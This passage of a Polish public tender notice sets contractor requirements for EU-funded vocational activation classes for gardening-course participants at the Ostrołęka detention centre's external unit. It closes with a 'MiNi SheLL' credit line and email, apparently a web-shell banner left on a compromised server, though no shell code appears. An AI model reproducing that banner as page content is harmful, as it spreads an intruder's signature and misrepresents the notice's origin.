dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu - zgodnie z Ustawą
o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych,
do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane
oświadczenie;
Wykonawca załączy do swojej oferty program zajęć aktywizacyjnych, który powinien być zgodny
z wymaganiami określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki 
Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia
przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór 
zaświadczenia o ukończeniu zajęć;
Zamawiający i Wykonawca przed rozpoczęciem zajęć aktywizacyjnych ustalą harmonogram
określający dni i godziny prowadzenia zajęć;
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik
multimedialny, drukarkę, kopiarkę - sprzętu zakupionego w ramach projektu 
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu
Społecznego;
Wykonawca przed rozpoczęciem zajęć ubezpieczy uczestników zajęć od następstw 
nieszczęśliwych wypadków na czas trwania zajęć aktywizacyjnych w niezbędnym zakresie;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji zajęć, która 
powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia Ministra 
Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca każdemu uczestnikowi przekaże komplet materiałów do pracy na zajęciach
 (skrypt/podręcznik, notatnik, długopis) i jeden komplet przekaże zamawiającemu;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu ze środków
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi 
logotypami na wszystkich dokumentach w ramach zajęć aktywizacyjnych oraz materiałach
dydaktycznych, zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące
oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na 
stronie internetowej Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zapewni przeprowadzenie zajęć aktywizacyjnych przez doradcę zawodowego;
Wykonawca zobowiązany będzie wydać uczestnikom zaświadczenie, na koniec zajęć 
aktywizacyjnych, potwierdzające udział w zajęciach,  wg wzorów  wynikających 
z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r. w sprawie uzyskania
i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych
w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji z zajęć  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji z zrealizowanych zajęć
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym
kontroli zajęć aktywizacyjnych współfinansowanych przez Unię Europejską w ramach 
Europejskiego Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących 
przepisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie aktywizacji zawodowej dla uczestników kursu Ogrodnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Planowany termin realizacji - przed rozpoczęciem Kursu Ogrodnik - zagospodarowanie terenów
zielonych;
Liczebność grupy: uczestnicy Kursu Ogrodnik - zagospodarowanie terenów zielonych; 
Liczba godzin: łącznie 20 godz. lekcyjnych zajęć indywidualnych (14 godz.) i grupowych 
(6 godz.);
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe
wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane
oświadczenie; 
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić zajęcia zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych
zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu
- zgodnie z Ustawą o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych
osobowych, do których Wykonawca uzyskał dostęp w związku z uczestnictwem
w projekcie - wymagane oświadczenie;
Wykonawca załączy do swojej oferty program zajęć aktywizacyjnych, który powinien być
zgodny z wymaganiami określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki
Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia
przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315)
oraz wzór zaświadczenia o ukończeniu zajęć;
Zamawiający i Wykonawca przed rozpoczęciem zajęć aktywizacyjnych ustalą harmonogram
określający dni i godziny prowadzenia zajęć;
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik
multimedialny, drukarkę, kopiarkę - sprzętu zakupionego w ramach projektu 
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego 
Funduszu Społecznego;
Wykonawca przed rozpoczęciem zajęć ubezpieczy uczestników zajęć od następstw 
nieszczęśliwych wypadków na czas trwania zajęć aktywizacyjnych w niezbędnym zakresie;

Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji zajęć,
która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia 
Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca każdemu uczestnikowi przekaże komplet. materiałów do pracy na zajęciach
 (skrypt/podręcznik, notatnik, długopis) i jeden dodatkowy komplet przekaże zamawiającemu;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu przez 
Unię Europejską w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi
logotypami na wszystkich dokumentach w ramach zajęć aktywizacyjnych oraz materiałach
dydaktycznych, zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące
oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na 
stronie internetowej Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zapewni przeprowadzenie zajęć aktywizacyjnych przez doradcę zawodowego;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji z zajęć oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji z zrealizowanych zajęć
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli zajęć aktywizacyjnych współfinansowanych przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących
przepisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com